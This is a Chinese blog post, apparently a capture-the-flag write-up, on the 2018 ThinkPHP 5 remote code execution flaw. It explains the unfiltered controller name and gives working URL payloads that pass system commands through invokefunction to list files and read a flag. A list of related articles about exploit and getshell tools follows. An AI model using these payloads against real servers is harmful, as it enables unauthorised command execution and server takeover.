ThinkPHP V5 漏洞利用

最新推荐文章于 2024-06-16 19:36:15 发布
最新推荐文章于 2024-06-16 19:36:15 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45694388/article/details/109082479
版权
本文介绍了ThinkPHP在2018年12月9日的安全更新,该更新修复了一个可能导致getshell漏洞的严重远程代码执行问题。主要原因是框架未充分检测控制器名,攻击者可利用此漏洞通过构造特定payload执行任意代码。文章详细分析了漏洞成因,并提供了漏洞利用的示例,提醒用户尽快升级到最新版本以确保系统安全。
摘要由CSDN通过智能技术生成

ThinkPHP 5漏洞简介

ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。

漏洞分析

程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。

漏洞利用
构造payload:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“ls”);%27
在这里插入图片描述寻找flag:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“find / -name ‘flag’”);%27
在这里插入图片描述
查看flag:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“cat …/…/…/flag”);%27
在这里插入图片描述

b1gpig安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
thinkphp5.1.39、tp5.1.39版本
06-01
此版本为tp5.1.39 是thinkphp5.1.39
ThinkPHP V5(漏洞解析及利用)及tornado知识点
qq_62046696的博客
10-03 3568
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
ThinkPHP V5.0.5漏洞_ThinkPHP漏洞分析与利用
weixin_39602280的博客
11-19 2547
一、组件介绍1.1 基本信息ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL...
ThinkPHP 5.1.X 反序列化漏洞:深入分析与利用技巧
最新发布
weixin_43822401的博客
06-16 505
在Web应用开发中,框架的安全性至关重要。ThinkPHP作为广泛使用的PHP开发框架,其版本5.1.X中存在一个反序列化漏洞,允许攻击者执行任意代码。本文将深入分析该漏洞的原理、利用方法,并提供相应的防护措施。
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2401
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8771
ThinkPHP5系列远程代码执行漏洞复现(详细)
thinkPHP_V5漏洞
qq_53099802的博客
04-28 3771
php_rce攻防世界
攻防世界 ThinkPHP V5(漏洞解析及利用)
热门推荐
Haowill的博客
04-12 1万+
ThinkPHP V5 攻防世界这道题,考察的是thinkphp V5的漏洞,接下来我详细介绍一下thinkphp V5这个漏洞。 ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5....
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的...通过合理利用这些工具,开发者可以提高项目的安全性,减少因漏洞被攻击的风险。同时,持续学习和理解安全知识,才能在面对新的威胁时,做出快速而有效的应对。
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不...
tp5漏洞利用工具.zip
01-03
3. `原理.txt`: 这个文件应该详细解释了这两种工具的工作原理和利用过程,包括如何构造恶意请求,以及如何利用漏洞来执行代码。 在深入研究和使用这些工具时,应当注意安全性和合法性。仅限于在你拥有授权或者进行...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
thinkphp 一键漏洞检测
12-09
然而,如同所有软件一样,ThinkPHP也有可能存在安全漏洞,这些漏洞可能被恶意用户利用,对网站造成严重威胁。"thinkphp 一键漏洞检测"工具正是为了解决这个问题而设计的。 该工具适用于ThinkPHP框架的多个版本,从V...
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7317
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
ThinkPHP 系列漏洞_thinkphp漏洞
2401_83739472的博客
04-12 1097
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。attr) : null //进行判断时,需要通过toArray()将getAttr($attr)进行数据类型转换,Output类中不存在toArray()方法,触发 think\console\Output::__call()调用不存在的方法。**一个人可以走的很快,但一群人才能走的更远。薪资区间6k-15k。
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 5923
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
ThinkPHP5.0.x远程执行漏洞分析与复现
qq_74148743的博客
05-11 1275
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞由ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 3735
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
thinkphp5.0.24漏洞利用工具
06-28
### 回答1: ThinkPHP是一款优秀的PHP开发框架,但在不久前,其官方发布的5.0.24版本中存在一处安全漏洞,可以被攻击者利用进行非法操作或流量劫持。 近期网络上出现了一些ThinkPHP5.0.24漏洞利用工具,攻击者可以利用这些工具进行恶意攻击,比如模拟用户登录、上传恶意文件、获取服务器权限等。而这些攻击都可能严重危害服务器安全,甚至导致数据泄露或丢失。 因此,使用ThinkPHP5.0.24漏洞利用工具的行为是不道德的、非法的,同时也将危及自己和他人的安全。我们应该高度关注漏洞修复的情况,并及时更新框架版本,以保障网站安全。 此外,防范漏洞利用的最好方式是对网站进行全面加固,比如使用防火墙、加强用户认证、控制权限等等。只有在加强安全方面的努力下,才能避免因漏洞被攻击,导致不必要的损失。 ### 回答2: thinkphp5.0.24是一种基于PHP的开源Web应用框架,简单易用,并且具有高度扩展性。然而,其中存在一个被恶意利用的漏洞,即命令执行漏洞,攻击者可以利用该漏洞执行任意命令。 针对这个漏洞,黑客们开发了一些利用工具。其中,比较常见的有ThinkPHP5.0/5.1 远程代码执行漏洞利用工具和thinkphp5.0.24远程代码执行漏洞利用工具。 这些利用工具的基本原理是通过漏洞点执行一段代码,然后让服务器返回含有WebShell的Payload。其中,一个比较常用的Payload是通过控制Meta信息中的User-Agent,让服务器返回一段WebShell代码。得到WebShell后,攻击者可以执行任意命令。 针对此类漏洞,建议管理员及时更新最新版本的ThinkPHP,并定期对系统进行安全扫描等操作,以及增强系统的安全性。另外,也建议加强员工安全意识教育,不要随意下载不明来源的文件或点击垃圾邮件等操作。 ### 回答3: ThinkPHP是一个使用PHP语言开发的MVC框架,它具有开源、易上手、性能强等优点,因此被广泛应用于各类Web开发中。但是,ThinkPHP也存在一些漏洞,例如ThinkPHP 5.0.24版本中,存在一种反序列化漏洞,攻击者可以通过发送一个恶意的HTTP请求来执行任意代码,造成系统安全威胁。 为了利用该漏洞,黑客们开发了一些漏洞利用工具。其中,比较有名的是一款名为“ThinkPHP5.0.24 反序列化命令执行漏洞一键”的工具,该工具可以帮助攻击者快速识别和利用漏洞,在不需要过多技术能力的情况下就能实现攻击。 具体来说,该工具可以通过一些简单的配置,如输入目标IP地址、选择漏洞扫描或直接执行命令等,来实现对已知漏洞目标的攻击,从而获取系统权限、窃取敏感信息等恶意行为。 但是,提醒广大用户,利用漏洞工具进行攻击是违法的行为,严格禁止任何个人和组织非法攻击和滥用该工具。我们应该采取更有效的方式,如及时更新补丁、加强网络安全防范等,来保障自己和他人的网络安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值